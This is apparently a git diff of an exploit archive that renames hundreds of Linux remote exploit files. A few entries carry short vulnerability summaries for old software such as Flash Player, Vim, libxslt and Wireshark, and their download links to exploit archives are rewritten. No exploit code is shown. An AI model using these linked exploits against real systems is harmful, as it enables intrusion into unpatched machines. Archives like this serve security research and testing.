100644 --- a/platforms/linux/remote/31630.txt +++ b/exploits/linux/remote/31630.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code in the context of t Adobe Flash Player 9.0.115.0 and earlier versions are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31630.rar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31630.rar \ No newline at end of file diff --git a/platforms/linux/remote/31875.py b/exploits/linux/remote/31875.py similarity index 100% rename from platforms/linux/remote/31875.py rename to exploits/linux/remote/31875.py diff --git a/platforms/linux/remote/31887.txt b/exploits/linux/remote/31887.txt similarity index 100% rename from platforms/linux/remote/31887.txt rename to exploits/linux/remote/31887.txt diff --git a/platforms/linux/remote/31903.asm b/exploits/linux/remote/31903.asm similarity index 100% rename from platforms/linux/remote/31903.asm rename to exploits/linux/remote/31903.asm diff --git a/platforms/linux/remote/32012.txt b/exploits/linux/remote/32012.txt similarity index 90% rename from platforms/linux/remote/32012.txt rename to exploits/linux/remote/32012.txt index adce8ce63..595c1b27a 100644 --- a/platforms/linux/remote/32012.txt +++ b/exploits/linux/remote/32012.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Netrw 125 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32012.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32012.tar.bz2 \ No newline at end of file diff --git a/platforms/linux/remote/32133.txt b/exploits/linux/remote/32133.txt similarity index 92% rename from platforms/linux/remote/32133.txt rename to exploits/linux/remote/32133.txt index d1760ee2f..63c7335ce 100644 --- a/platforms/linux/remote/32133.txt +++ b/exploits/linux/remote/32133.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects libxslt 1.1.8 to 1.1.24. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32133.xsl \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32133.xsl \ No newline at end of file diff --git a/platforms/linux/remote/32165.txt b/exploits/linux/remote/32165.txt similarity index 100% rename from platforms/linux/remote/32165.txt rename to exploits/linux/remote/32165.txt diff --git a/platforms/linux/remote/32166.txt b/exploits/linux/remote/32166.txt similarity index 100% rename from platforms/linux/remote/32166.txt rename to exploits/linux/remote/32166.txt diff --git a/platforms/linux/remote/32225.txt b/exploits/linux/remote/32225.txt similarity index 92% rename from platforms/linux/remote/32225.txt rename to exploits/linux/remote/32225.txt index 25d2ced5d..58bd665bb 100644 --- a/platforms/linux/remote/32225.txt +++ b/exploits/linux/remote/32225.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code with the privileges This issue affects Vim 6.2.429 through 6.3.058. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32225.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32225.zip \ No newline at end of file diff --git a/platforms/linux/remote/32228.xml b/exploits/linux/remote/32228.xml similarity index 100% rename from platforms/linux/remote/32228.xml rename to exploits/linux/remote/32228.xml diff --git a/platforms/linux/remote/32286.txt b/exploits/linux/remote/32286.txt similarity index 100% rename from platforms/linux/remote/32286.txt rename to exploits/linux/remote/32286.txt diff --git a/platforms/linux/remote/32289.txt b/exploits/linux/remote/32289.txt similarity index 100% rename from platforms/linux/remote/32289.txt rename to exploits/linux/remote/32289.txt diff --git a/platforms/linux/remote/32303.txt b/exploits/linux/remote/32303.txt similarity index 100% rename from platforms/linux/remote/32303.txt rename to exploits/linux/remote/32303.txt diff --git a/platforms/linux/remote/32445.txt b/exploits/linux/remote/32445.txt similarity index 100% rename from platforms/linux/remote/32445.txt rename to exploits/linux/remote/32445.txt diff --git a/platforms/linux/remote/32470.rb b/exploits/linux/remote/32470.rb similarity index 100% rename from platforms/linux/remote/32470.rb rename to exploits/linux/remote/32470.rb diff --git a/platforms/linux/remote/32515.rb b/exploits/linux/remote/32515.rb similarity index 100% rename from platforms/linux/remote/32515.rb rename to exploits/linux/remote/32515.rb diff --git a/platforms/linux/remote/32530.txt b/exploits/linux/remote/32530.txt similarity index 100% rename from platforms/linux/remote/32530.txt rename to exploits/linux/remote/32530.txt diff --git a/platforms/linux/remote/32548.html b/exploits/linux/remote/32548.html similarity index 100% rename from platforms/linux/remote/32548.html rename to exploits/linux/remote/32548.html diff --git a/platforms/linux/remote/32690.txt b/exploits/linux/remote/32690.txt similarity index 100% rename from platforms/linux/remote/32690.txt rename to exploits/linux/remote/32690.txt diff --git a/platforms/linux/remote/32691.txt b/exploits/linux/remote/32691.txt similarity index 92% rename from platforms/linux/remote/32691.txt rename to exploits/linux/remote/32691.txt index c4dd41d8e..d35c373fe 100644 --- a/platforms/linux/remote/32691.txt +++ b/exploits/linux/remote/32691.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary machine code in the cont This issue affects libaudiofile 0.2.6; other versions may also be vulnerable. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32691.wav \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/32691.wav \ No newline at end of file diff --git a/platforms/linux/remote/32780.py b/exploits/linux/remote/32780.py similarity index 100% rename from platforms/linux/remote/32780.py rename to exploits/linux/remote/32780.py diff --git a/platforms/linux/remote/32796.txt b/exploits/linux/remote/32796.txt similarity index 100% rename from platforms/linux/remote/32796.txt rename to exploits/linux/remote/32796.txt diff --git a/platforms/linux/remote/32825.txt b/exploits/linux/remote/32825.txt similarity index 100% rename from platforms/linux/remote/32825.txt rename to exploits/linux/remote/32825.txt diff --git a/platforms/linux/remote/32834.txt b/exploits/linux/remote/32834.txt similarity index 100% rename from platforms/linux/remote/32834.txt rename to exploits/linux/remote/32834.txt diff --git a/platforms/linux/remote/32837.py b/exploits/linux/remote/32837.py similarity index 100% rename from platforms/linux/remote/32837.py rename to exploits/linux/remote/32837.py diff --git a/platforms/linux/remote/32929.txt b/exploits/linux/remote/32929.txt similarity index 100% rename from platforms/linux/remote/32929.txt rename to exploits/linux/remote/32929.txt diff --git a/platforms/linux/remote/32942.txt b/exploits/linux/remote/32942.txt similarity index 100% rename from platforms/linux/remote/32942.txt rename to exploits/linux/remote/32942.txt diff --git a/platforms/linux/remote/32965.c b/exploits/linux/remote/32965.c similarity index 100% rename from platforms/linux/remote/32965.c rename to exploits/linux/remote/32965.c diff --git a/platforms/linux/remote/33.c b/exploits/linux/remote/33.c similarity index 100% rename from platforms/linux/remote/33.c rename to exploits/linux/remote/33.c diff --git a/platforms/linux/remote/33032.txt b/exploits/linux/remote/33032.txt similarity index 90% rename from platforms/linux/remote/33032.txt rename to exploits/linux/remote/33032.txt index fe28efd16..3c0128a50 100644 --- a/platforms/linux/remote/33032.txt +++ b/exploits/linux/remote/33032.txt @@ -7,4 +7,4 @@ Successful exploits may allow remote attackers to execute arbitrary code or caus Versions prior to 'Compress::Raw::Zlib' 2.017 are affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33032.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33032.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/33034.txt b/exploits/linux/remote/33034.txt similarity index 100% rename from platforms/linux/remote/33034.txt rename to exploits/linux/remote/33034.txt diff --git a/platforms/linux/remote/33039.txt b/exploits/linux/remote/33039.txt similarity index 100% rename from platforms/linux/remote/33039.txt rename to exploits/linux/remote/33039.txt diff --git a/platforms/linux/remote/33053.txt b/exploits/linux/remote/33053.txt similarity index 100% rename from platforms/linux/remote/33053.txt rename to exploits/linux/remote/33053.txt diff --git a/platforms/linux/remote/33103.html b/exploits/linux/remote/33103.html similarity index 100% rename from platforms/linux/remote/33103.html rename to exploits/linux/remote/33103.html diff --git a/platforms/linux/remote/3329.c b/exploits/linux/remote/3329.c similarity index 100% rename from platforms/linux/remote/3329.c rename to exploits/linux/remote/3329.c diff --git a/platforms/linux/remote/33311.txt b/exploits/linux/remote/33311.txt similarity index 100% rename from platforms/linux/remote/33311.txt rename to exploits/linux/remote/33311.txt diff --git a/platforms/linux/remote/33313.txt b/exploits/linux/remote/33313.txt similarity index 92% rename from platforms/linux/remote/33313.txt rename to exploits/linux/remote/33313.txt index e4c5af5dd..6f1ce9142 100644 --- a/platforms/linux/remote/33313.txt +++ b/exploits/linux/remote/33313.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary code and to cause denial NOTE: This issue was previously covered in BID 36843 (Mozilla Firefox and SeaMonkey MFSA 2009-52 through -64 Multiple Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33313.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33313.tgz \ No newline at end of file diff --git a/platforms/linux/remote/33315.java b/exploits/linux/remote/33315.java similarity index 100% rename from platforms/linux/remote/33315.java rename to exploits/linux/remote/33315.java diff --git a/platforms/linux/remote/33364.txt b/exploits/linux/remote/33364.txt similarity index 100% rename from platforms/linux/remote/33364.txt rename to exploits/linux/remote/33364.txt diff --git a/platforms/linux/remote/33388.f b/exploits/linux/remote/33388.f similarity index 100% rename from platforms/linux/remote/33388.f rename to exploits/linux/remote/33388.f diff --git a/platforms/linux/remote/33402.txt b/exploits/linux/remote/33402.txt similarity index 100% rename from platforms/linux/remote/33402.txt rename to exploits/linux/remote/33402.txt diff --git a/platforms/linux/remote/33535.txt b/exploits/linux/remote/33535.txt similarity index 100% rename from platforms/linux/remote/33535.txt rename to exploits/linux/remote/33535.txt diff --git a/platforms/linux/remote/33554.py b/exploits/linux/remote/33554.py similarity index 100% rename from platforms/linux/remote/33554.py rename to exploits/linux/remote/33554.py diff --git a/platforms/linux/remote/33598.rb b/exploits/linux/remote/33598.rb similarity index 100% rename from platforms/linux/remote/33598.rb rename to exploits/linux/remote/33598.rb diff --git a/platforms/linux/remote/33599.txt b/exploits/linux/remote/33599.txt similarity index 100% rename from platforms/linux/remote/33599.txt rename to exploits/linux/remote/33599.txt diff --git a/platforms/linux/remote/33620.txt b/exploits/linux/remote/33620.txt similarity index 100% rename from platforms/linux/remote/33620.txt rename to exploits/linux/remote/33620.txt diff --git a/platforms/linux/remote/33622.txt b/exploits/linux/remote/33622.txt similarity index 100% rename from platforms/linux/remote/33622.txt rename to exploits/linux/remote/33622.txt diff --git a/platforms/linux/remote/33752.html b/exploits/linux/remote/33752.html similarity index 100% rename from platforms/linux/remote/33752.html rename to exploits/linux/remote/33752.html diff --git a/platforms/linux/remote/33783.txt b/exploits/linux/remote/33783.txt similarity index 100% rename from platforms/linux/remote/33783.txt rename to exploits/linux/remote/33783.txt diff --git a/platforms/linux/remote/33798.html b/exploits/linux/remote/33798.html similarity index 100% rename from platforms/linux/remote/33798.html rename to exploits/linux/remote/33798.html diff --git a/platforms/linux/remote/33805.pl b/exploits/linux/remote/33805.pl similarity index 100% rename from platforms/linux/remote/33805.pl rename to exploits/linux/remote/33805.pl diff --git a/platforms/linux/remote/33826.txt b/exploits/linux/remote/33826.txt similarity index 100% rename from platforms/linux/remote/33826.txt rename to exploits/linux/remote/33826.txt diff --git a/platforms/linux/remote/33855.txt b/exploits/linux/remote/33855.txt similarity index 100% rename from platforms/linux/remote/33855.txt rename to exploits/linux/remote/33855.txt diff --git a/platforms/linux/remote/33865.rb b/exploits/linux/remote/33865.rb similarity index 100% rename from platforms/linux/remote/33865.rb rename to exploits/linux/remote/33865.rb diff --git a/platforms/linux/remote/3389.c b/exploits/linux/remote/3389.c similarity index 100% rename from platforms/linux/remote/3389.c rename to exploits/linux/remote/3389.c diff --git a/platforms/linux/remote/33949.txt b/exploits/linux/remote/33949.txt similarity index 100% rename from platforms/linux/remote/33949.txt rename to exploits/linux/remote/33949.txt diff --git a/platforms/linux/remote/34.pl b/exploits/linux/remote/34.pl similarity index 100% rename from platforms/linux/remote/34.pl rename to exploits/linux/remote/34.pl diff --git a/platforms/linux/remote/340.c b/exploits/linux/remote/340.c similarity index 100% rename from platforms/linux/remote/340.c rename to exploits/linux/remote/340.c diff --git a/platforms/linux/remote/34026.py b/exploits/linux/remote/34026.py similarity index 100% rename from platforms/linux/remote/34026.py rename to exploits/linux/remote/34026.py diff --git a/platforms/linux/remote/34152.txt b/exploits/linux/remote/34152.txt similarity index 100% rename from platforms/linux/remote/34152.txt rename to exploits/linux/remote/34152.txt diff --git a/platforms/linux/remote/34192.txt b/exploits/linux/remote/34192.txt similarity index 93% rename from platforms/linux/remote/34192.txt rename to exploits/linux/remote/34192.txt index 5519e236a..ab69c8d99 100644 --- a/platforms/linux/remote/34192.txt +++ b/exploits/linux/remote/34192.txt @@ -13,4 +13,4 @@ SeaMonkey 2.0.5 NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34192.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34192.zip \ No newline at end of file diff --git a/platforms/linux/remote/34201.txt b/exploits/linux/remote/34201.txt similarity index 100% rename from platforms/linux/remote/34201.txt rename to exploits/linux/remote/34201.txt diff --git a/platforms/linux/remote/34335.rb b/exploits/linux/remote/34335.rb similarity index 100% rename from platforms/linux/remote/34335.rb rename to exploits/linux/remote/34335.rb diff --git a/platforms/linux/remote/34358.txt b/exploits/linux/remote/34358.txt similarity index 93% rename from platforms/linux/remote/34358.txt rename to exploits/linux/remote/34358.txt index 9f58d89b4..237bb7e2f 100644 --- a/platforms/linux/remote/34358.txt +++ b/exploits/linux/remote/34358.txt @@ -12,4 +12,4 @@ SeaMonkey 2.0.6 NOTE: This issue was previously covered in BID 41824 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-34 Through -47 Multiple Remote Vulnerabilities), but has been assigned its own record to better document it. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34358.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34358.zip \ No newline at end of file diff --git a/platforms/linux/remote/34362.rb b/exploits/linux/remote/34362.rb similarity index 100% rename from platforms/linux/remote/34362.rb rename to exploits/linux/remote/34362.rb diff --git a/platforms/linux/remote/34385.txt b/exploits/linux/remote/34385.txt similarity index 100% rename from platforms/linux/remote/34385.txt rename to exploits/linux/remote/34385.txt diff --git a/platforms/linux/remote/34426.txt b/exploits/linux/remote/34426.txt similarity index 100% rename from platforms/linux/remote/34426.txt rename to exploits/linux/remote/34426.txt diff --git a/platforms/linux/remote/34431.html b/exploits/linux/remote/34431.html similarity index 100% rename from platforms/linux/remote/34431.html rename to exploits/linux/remote/34431.html diff --git a/platforms/linux/remote/34507.txt b/exploits/linux/remote/34507.txt similarity index 100% rename from platforms/linux/remote/34507.txt rename to exploits/linux/remote/34507.txt diff --git a/platforms/linux/remote/34595.py b/exploits/linux/remote/34595.py similarity index 100% rename from platforms/linux/remote/34595.py rename to exploits/linux/remote/34595.py diff --git a/platforms/linux/remote/347.c b/exploits/linux/remote/347.c similarity index 100% rename from platforms/linux/remote/347.c rename to exploits/linux/remote/347.c diff --git a/platforms/linux/remote/34765.txt b/exploits/linux/remote/34765.txt similarity index 100% rename from platforms/linux/remote/34765.txt rename to exploits/linux/remote/34765.txt diff --git a/platforms/linux/remote/34766.php b/exploits/linux/remote/34766.php similarity index 100% rename from platforms/linux/remote/34766.php rename to exploits/linux/remote/34766.php diff --git a/platforms/linux/remote/348.c b/exploits/linux/remote/348.c similarity index 100% rename from platforms/linux/remote/348.c rename to exploits/linux/remote/348.c diff --git a/platforms/linux/remote/34860.py b/exploits/linux/remote/34860.py similarity index 100% rename from platforms/linux/remote/34860.py rename to exploits/linux/remote/34860.py diff --git a/platforms/linux/remote/34862.rb b/exploits/linux/remote/34862.rb similarity index 100% rename from platforms/linux/remote/34862.rb rename to exploits/linux/remote/34862.rb diff --git a/platforms/linux/remote/34866.rb b/exploits/linux/remote/34866.rb similarity index 100% rename from platforms/linux/remote/34866.rb rename to exploits/linux/remote/34866.rb diff --git a/platforms/linux/remote/34879.txt b/exploits/linux/remote/34879.txt similarity index 100% rename from platforms/linux/remote/34879.txt rename to exploits/linux/remote/34879.txt diff --git a/platforms/linux/remote/34881.html b/exploits/linux/remote/34881.html similarity index 100% rename from platforms/linux/remote/34881.html rename to exploits/linux/remote/34881.html diff --git a/platforms/linux/remote/34896.py b/exploits/linux/remote/34896.py similarity index 100% rename from platforms/linux/remote/34896.py rename to exploits/linux/remote/34896.py diff --git a/platforms/linux/remote/34900.py b/exploits/linux/remote/34900.py similarity index 100% rename from platforms/linux/remote/34900.py rename to exploits/linux/remote/34900.py diff --git a/platforms/linux/remote/34932.html b/exploits/linux/remote/34932.html similarity index 100% rename from platforms/linux/remote/34932.html rename to exploits/linux/remote/34932.html diff --git a/platforms/linux/remote/34998.txt b/exploits/linux/remote/34998.txt similarity index 100% rename from platforms/linux/remote/34998.txt rename to exploits/linux/remote/34998.txt diff --git a/platforms/linux/remote/34999.txt b/exploits/linux/remote/34999.txt similarity index 100% rename from platforms/linux/remote/34999.txt rename to exploits/linux/remote/34999.txt diff --git a/platforms/linux/remote/35011.txt b/exploits/linux/remote/35011.txt similarity index 100% rename from platforms/linux/remote/35011.txt rename to exploits/linux/remote/35011.txt diff --git a/platforms/linux/remote/35018.c b/exploits/linux/remote/35018.c similarity index 100% rename from platforms/linux/remote/35018.c rename to exploits/linux/remote/35018.c diff --git a/platforms/linux/remote/35095.txt b/exploits/linux/remote/35095.txt similarity index 100% rename from platforms/linux/remote/35095.txt rename to exploits/linux/remote/35095.txt diff --git a/platforms/linux/remote/35115.rb b/exploits/linux/remote/35115.rb similarity index 100% rename from platforms/linux/remote/35115.rb rename to exploits/linux/remote/35115.rb diff --git a/platforms/linux/remote/35132.txt b/exploits/linux/remote/35132.txt similarity index 100% rename from platforms/linux/remote/35132.txt rename to exploits/linux/remote/35132.txt diff --git a/platforms/linux/remote/35148.txt b/exploits/linux/remote/35148.txt similarity index 100% rename from platforms/linux/remote/35148.txt rename to exploits/linux/remote/35148.txt diff --git a/platforms/linux/remote/35232.txt b/exploits/linux/remote/35232.txt similarity index 89% rename from platforms/linux/remote/35232.txt rename to exploits/linux/remote/35232.txt index 3258da98b..9bad576a7 100644 --- a/platforms/linux/remote/35232.txt +++ b/exploits/linux/remote/35232.txt @@ -4,4 +4,4 @@ Pango is prone to a remote heap-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35232.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35232.zip \ No newline at end of file diff --git a/platforms/linux/remote/35314.txt b/exploits/linux/remote/35314.txt similarity index 90% rename from platforms/linux/remote/35314.txt rename to exploits/linux/remote/35314.txt index 393f63364..fefd2ecd3 100644 --- a/platforms/linux/remote/35314.txt +++ b/exploits/linux/remote/35314.txt @@ -4,4 +4,4 @@ Wireshark is prone to a memory-corruption vulnerability because it fails to prop Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35314.pcap \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35314.pcap \ No newline at end of file diff --git a/platforms/linux/remote/35356.rb b/exploits/linux/remote/35356.rb similarity index 100% rename from platforms/linux/remote/35356.rb rename to exploits/linux/remote/35356.rb diff --git a/platforms/linux/remote/35386.txt b/exploits/linux/remote/35386.txt similarity index 100% rename from platforms/linux/remote/35386.txt rename to exploits/linux/remote/35386.txt diff --git a/platforms/linux/remote/35466.sh b/exploits/linux/remote/35466.sh similarity index 100% rename from platforms/linux/remote/35466.sh rename to exploits/linux/remote/35466.sh diff --git a/platforms/linux/remote/35513.py b/exploits/linux/remote/35513.py similarity index 100% rename from platforms/linux/remote/35513.py rename to exploits/linux/remote/35513.py diff --git a/platforms/linux/remote/3554.pm b/exploits/linux/remote/3554.pm similarity index 100% rename from platforms/linux/remote/3554.pm rename to exploits/linux/remote/3554.pm diff --git a/platforms/linux/remote/35554.txt b/exploits/linux/remote/35554.txt similarity index 100% rename from platforms/linux/remote/35554.txt rename to exploits/linux/remote/35554.txt diff --git a/platforms/linux/remote/35581.rb b/exploits/linux/remote/35581.rb similarity index 100% rename from platforms/linux/remote/35581.rb rename to exploits/linux/remote/35581.rb diff --git a/platforms/linux/remote/35606.txt b/exploits/linux/remote/35606.txt similarity index 100% rename from platforms/linux/remote/35606.txt rename to exploits/linux/remote/35606.txt diff --git a/platforms/linux/remote/35644.txt b/exploits/linux/remote/35644.txt similarity index 100% rename from platforms/linux/remote/35644.txt rename to exploits/linux/remote/35644.txt diff --git a/platforms/linux/remote/35784.php b/exploits/linux/remote/35784.php similarity index 100% rename from platforms/linux/remote/35784.php rename to exploits/linux/remote/35784.php diff --git a/platforms/linux/remote/35785.txt b/exploits/linux/remote/35785.txt similarity index 100% rename from platforms/linux/remote/35785.txt rename to exploits/linux/remote/35785.txt diff --git a/platforms/linux/remote/35799.txt b/exploits/linux/remote/35799.txt similarity index 100% rename from platforms/linux/remote/35799.txt rename to exploits/linux/remote/35799.txt diff --git a/platforms/linux/remote/35801.txt b/exploits/linux/remote/35801.txt similarity index 100% rename from platforms/linux/remote/35801.txt rename to exploits/linux/remote/35801.txt diff --git a/platforms/linux/remote/35810.txt b/exploits/linux/remote/35810.txt similarity index 100% rename from platforms/linux/remote/35810.txt rename to exploits/linux/remote/35810.txt diff --git a/platforms/linux/remote/35836.pl b/exploits/linux/remote/35836.pl similarity index 100% rename from platforms/linux/remote/35836.pl rename to exploits/linux/remote/35836.pl diff --git a/platforms/linux/remote/359.c b/exploits/linux/remote/359.c similarity index 100% rename from platforms/linux/remote/359.c rename to exploits/linux/remote/359.c diff --git a/platforms/linux/remote/3609.py b/exploits/linux/remote/3609.py similarity index 100% rename from platforms/linux/remote/3609.py rename to exploits/linux/remote/3609.py diff --git a/platforms/linux/remote/36199.txt b/exploits/linux/remote/36199.txt similarity index 100% rename from platforms/linux/remote/36199.txt rename to exploits/linux/remote/36199.txt diff --git a/platforms/linux/remote/36263.rb b/exploits/linux/remote/36263.rb similarity index 100% rename from platforms/linux/remote/36263.rb rename to exploits/linux/remote/36263.rb diff --git a/platforms/linux/remote/36337.py b/exploits/linux/remote/36337.py similarity index 100% rename from platforms/linux/remote/36337.py rename to exploits/linux/remote/36337.py diff --git a/platforms/linux/remote/36352.txt b/exploits/linux/remote/36352.txt similarity index 100% rename from platforms/linux/remote/36352.txt rename to exploits/linux/remote/36352.txt diff --git a/platforms/linux/remote/36370.txt b/exploits/linux/remote/36370.txt similarity index 100% rename from platforms/linux/remote/36370.txt rename to exploits/linux/remote/36370.txt diff --git a/platforms/linux/remote/364.pl b/exploits/linux/remote/364.pl similarity index 100% rename from platforms/linux/remote/364.pl rename to exploits/linux/remote/364.pl diff --git a/platforms/linux/remote/36421.rb b/exploits/linux/remote/36421.rb similarity index 100% rename from platforms/linux/remote/36421.rb rename to exploits/linux/remote/36421.rb diff --git a/platforms/linux/remote/36562.txt b/exploits/linux/remote/36562.txt similarity index 100% rename from platforms/linux/remote/36562.txt rename to exploits/linux/remote/36562.txt diff --git a/platforms/linux/remote/36663.txt b/exploits/linux/remote/36663.txt similarity index 100% rename from platforms/linux/remote/36663.txt rename to exploits/linux/remote/36663.txt diff --git a/platforms/linux/remote/36690.rb b/exploits/linux/remote/36690.rb similarity index 100% rename from platforms/linux/remote/36690.rb rename to exploits/linux/remote/36690.rb diff --git a/platforms/linux/remote/36742.txt b/exploits/linux/remote/36742.txt similarity index 100% rename from platforms/linux/remote/36742.txt rename to exploits/linux/remote/36742.txt diff --git a/platforms/linux/remote/36803.py b/exploits/linux/remote/36803.py similarity index 100% rename from platforms/linux/remote/36803.py rename to exploits/linux/remote/36803.py diff --git a/platforms/linux/remote/36884.py b/exploits/linux/remote/36884.py similarity index 100% rename from platforms/linux/remote/36884.py rename to exploits/linux/remote/36884.py diff --git a/platforms/linux/remote/36933.py b/exploits/linux/remote/36933.py similarity index 100% rename from platforms/linux/remote/36933.py rename to exploits/linux/remote/36933.py diff --git a/platforms/linux/remote/3698.txt b/exploits/linux/remote/3698.txt similarity index 100% rename from platforms/linux/remote/3698.txt rename to exploits/linux/remote/3698.txt diff --git a/platforms/linux/remote/37007.txt b/exploits/linux/remote/37007.txt similarity index 100% rename from platforms/linux/remote/37007.txt rename to exploits/linux/remote/37007.txt diff --git a/platforms/linux/remote/37169.rb b/exploits/linux/remote/37169.rb similarity index 100% rename from platforms/linux/remote/37169.rb rename to exploits/linux/remote/37169.rb diff --git a/platforms/linux/remote/372.c b/exploits/linux/remote/372.c similarity index 100% rename from platforms/linux/remote/372.c rename to exploits/linux/remote/372.c diff --git a/platforms/linux/remote/3724.c b/exploits/linux/remote/3724.c similarity index 100% rename from platforms/linux/remote/3724.c rename to exploits/linux/remote/3724.c diff --git a/platforms/linux/remote/37262.rb b/exploits/linux/remote/37262.rb similarity index 100% rename from platforms/linux/remote/37262.rb rename to exploits/linux/remote/37262.rb diff --git a/platforms/linux/remote/373.c b/exploits/linux/remote/373.c similarity index 100% rename from platforms/linux/remote/373.c rename to exploits/linux/remote/373.c diff --git a/platforms/linux/remote/37576.cpp b/exploits/linux/remote/37576.cpp similarity index 100% rename from platforms/linux/remote/37576.cpp rename to exploits/linux/remote/37576.cpp diff --git a/platforms/linux/remote/37788.py b/exploits/linux/remote/37788.py similarity index 100% rename from platforms/linux/remote/37788.py rename to exploits/linux/remote/37788.py diff --git a/platforms/linux/remote/37834.py b/exploits/linux/remote/37834.py similarity index 100% rename from platforms/linux/remote/37834.py rename to exploits/linux/remote/37834.py diff --git a/platforms/linux/remote/3787.c b/exploits/linux/remote/3787.c similarity index 100% rename from platforms/linux/remote/3787.c rename to exploits/linux/remote/3787.c diff --git a/platforms/linux/remote/37889.txt b/exploits/linux/remote/37889.txt similarity index 100% rename from platforms/linux/remote/37889.txt rename to exploits/linux/remote/37889.txt diff --git a/platforms/linux/remote/379.txt b/exploits/linux/remote/379.txt similarity index 100% rename from platforms/linux/remote/379.txt rename to exploits/linux/remote/379.txt diff --git a/platforms/linux/remote/37949.txt b/exploits/linux/remote/37949.txt similarity index 100% rename from platforms/linux/remote/37949.txt rename to exploits/linux/remote/37949.txt diff --git a/platforms/linux/remote/380.c b/exploits/linux/remote/380.c similarity index 100% rename from platforms/linux/remote/380.c rename to exploits/linux/remote/380.c diff --git a/platforms/linux/remote/38096.rb b/exploits/linux/remote/38096.rb similarity index 100% rename from platforms/linux/remote/38096.rb rename to exploits/linux/remote/38096.rb diff --git a/platforms/linux/remote/38109.pl b/exploits/linux/remote/38109.pl similarity index 100% rename from platforms/linux/remote/38109.pl rename to exploits/linux/remote/38109.pl diff --git a/platforms/linux/remote/3815.c b/exploits/linux/remote/3815.c similarity index 100% rename from platforms/linux/remote/3815.c rename to exploits/linux/remote/3815.c diff --git a/platforms/linux/remote/382.c b/exploits/linux/remote/382.c similarity index 100% rename from platforms/linux/remote/382.c rename to exploits/linux/remote/382.c diff --git a/platforms/linux/remote/38203.txt b/exploits/linux/remote/38203.txt similarity index 100% rename from platforms/linux/remote/38203.txt rename to exploits/linux/remote/38203.txt diff --git a/platforms/linux/remote/3821.c b/exploits/linux/remote/3821.c similarity index 100% rename from platforms/linux/remote/3821.c rename to exploits/linux/remote/3821.c diff --git a/platforms/linux/remote/3829.c b/exploits/linux/remote/3829.c similarity index 100% rename from platforms/linux/remote/3829.c rename to exploits/linux/remote/3829.c diff --git a/platforms/linux/remote/38522.txt b/exploits/linux/remote/38522.txt similarity index 100% rename from platforms/linux/remote/38522.txt rename to exploits/linux/remote/38522.txt diff --git a/platforms/linux/remote/386.c b/exploits/linux/remote/386.c similarity index 100% rename from platforms/linux/remote/386.c rename to exploits/linux/remote/386.c diff --git a/platforms/linux/remote/38680.html b/exploits/linux/remote/38680.html similarity index 100% rename from platforms/linux/remote/38680.html rename to exploits/linux/remote/38680.html diff --git a/platforms/linux/remote/387.c b/exploits/linux/remote/387.c similarity index 100% rename from platforms/linux/remote/387.c rename to exploits/linux/remote/387.c diff --git a/platforms/linux/remote/38741.txt b/exploits/linux/remote/38741.txt similarity index 100% rename from platforms/linux/remote/38741.txt rename to exploits/linux/remote/38741.txt diff --git a/platforms/linux/remote/38826.py b/exploits/linux/remote/38826.py similarity index 100% rename from platforms/linux/remote/38826.py rename to exploits/linux/remote/38826.py diff --git a/platforms/linux/remote/389.c b/exploits/linux/remote/389.c similarity index 100% rename from platforms/linux/remote/389.c rename to exploits/linux/remote/389.c diff --git a/platforms/linux/remote/39.c b/exploits/linux/remote/39.c similarity index 100% rename from platforms/linux/remote/39.c rename to exploits/linux/remote/39.c diff --git a/platforms/linux/remote/390.c b/exploits/linux/remote/390.c similarity index 100% rename from platforms/linux/remote/390.c rename to exploits/linux/remote/390.c diff --git a/platforms/linux/remote/39097.txt b/exploits/linux/remote/39097.txt similarity index 100% rename from platforms/linux/remote/39097.txt rename to exploits/linux/remote/39097.txt diff --git a/platforms/linux/remote/39155.txt b/exploits/linux/remote/39155.txt similarity index 100% rename from platforms/linux/remote/39155.txt rename to exploits/linux/remote/39155.txt diff --git 